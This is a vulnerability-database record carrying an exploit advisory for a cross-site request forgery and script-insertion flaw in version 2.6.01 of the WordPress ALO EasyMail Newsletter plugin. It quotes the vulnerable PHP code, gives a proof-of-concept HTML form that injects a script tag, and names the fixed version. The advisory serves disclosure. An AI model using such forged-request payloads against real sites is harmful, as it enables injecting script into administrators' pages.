{"id": "PACKETSTORM:135780", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress ALO EasyMail Newsletter 2.6.01 CSRF", "description": "", "published": "2016-02-16T00:00:00", "modified": "2016-02-16T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/135780/WordPress-ALO-EasyMail-Newsletter-2.6.01-CSRF.html", "reporter": "Mohsen Lotfi", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:19:53", "viewCount": 12, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/135780/wpaloeasymailnewsletter-xsrf.txt", "sourceData": "`# Exploit Title: Wordpress ALO EasyMail Newsletter plugin cross-site request forgery vulnerability \n# Software Link: https://wordpress.org/plugins/alo-easymail/ \n# Affected Version: 2.6.01 \n# Exploit Author: Mohsen Lotfi \n# Contact: mohsen.lotfi.all@gmail.com \n# Twitter: fox_one_fox_one \n# Date: 01-16-2016 \n \n##################### \n1. Description \n##################### \n \nThe plugin contains a CSRF vulnerability, which can be exploited to perform a script insertion attack. \n \nscript insertion happens in wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php : \n \ncase \"save_list\": // SAVE a mailing list (add or update) \nif ( isset($_REQUEST['submit_list']) ) { \n//$list_name = stripslashes( trim( $_POST['elp_list_name'] ) ); \n \n// List name \n$list_name = array(); \nforeach ( $languages as $key => $lang ) { \nif (isset($_POST['listname_'.$lang]) ) $list_name[$lang] = stripslashes(trim($_POST['listname_'.$lang])); /* script insertion here */ \n} \n \n$list_available = stripslashes( trim( $_POST['elp_list_available'] ) ); \n$list_order = stripslashes( trim( $_POST['elp_list_order'] ) ); \nif ( $list_name && $list_available && is_numeric($list_order) ) { \n$mailinglists = alo_em_get_mailinglists ( 'hidden,admin,public' ); \nif ( $list_id ) { // update \n$mailinglists [$list_id] = array ( \"name\" => $list_name, \"available\" => $list_available, \"order\" => $list_order ); \n} else { // or add a new \nif ( empty($mailinglists) ) { // if 1st list, skip index 0 \n$mailinglists [] = array ( \"name\" => \"not-used\", \"available\" => \"deleted\", \"order\" => \"\"); \n} \n$mailinglists [] = array ( \"name\" => $list_name, \"available\" => $list_available, \"order\" => $list_order); \n} \nif ( alo_em_save_mailinglists ( $mailinglists ) ) { \nunset ( $list_id ); \nunset ( $list_name ); \nunset ( $list_available ); \nunset ( $list_order ); \necho '<div id=\"message\" class=\"updated fade\"><p>'. __(\"Updated\", \"alo-easymail\") .'</p></div>'; \n} else { \necho '<div id=\"message\" class=\"error\"><p>'. __(\"Error during operation.\", \"alo-easymail\") .'</p></div>'; \n} \n} else { \necho '<div id=\"message\" class=\"error\"><p>'. __(\"Inputs are incompled or wrong. Please check and try again.\", \"alo-easymail\") .'</p></div>'; \n} \n} \nbreak; \n \n \n##################### \n2. Proof of Concept \n##################### \n \nLogin as regular user then: \n \n<form method=\"post\" action=\"http://localhost/wordpress4.4/wp-admin/edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php\"> \n<input type=\"hidden\" name=\"listname_en\" value=\"<script>alert('xss')</script>\"> \n<input type=\"hidden\" name=\"elp_list_available\" value=\"hidden\"> \n<input type=\"hidden\" name=\"elp_list_order\" value=\"0\"> \n<input type=\"hidden\" name=\"user_ID\" value=\"1\"> \n<input type=\"hidden\" name=\"task\" value=\"save_list\"> \n<input type=\"hidden\" name=\"list_id\" value=\"\"> \n<input type=\"submit\" name=\"submit_list\" value=\"Trigger!\"> \n</form> \n \n \n##################### \n3. Sulotion \n##################### \n \nUpdate to version 2.7.0 \nhttps://wordpress.org/plugins/alo-easymail/changelog/ \n \n##################### \n4. Report Timeline \n##################### \n \n01-16-2016 : Vulnerability discovered. \n01-25-2016 : Vendor notified of vulnerability. \n02-07-2016 : Vendor replied and released fixed version. \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647666985}}
{}
WordPress ALO EasyMail Newsletter 2.6.01 CSRF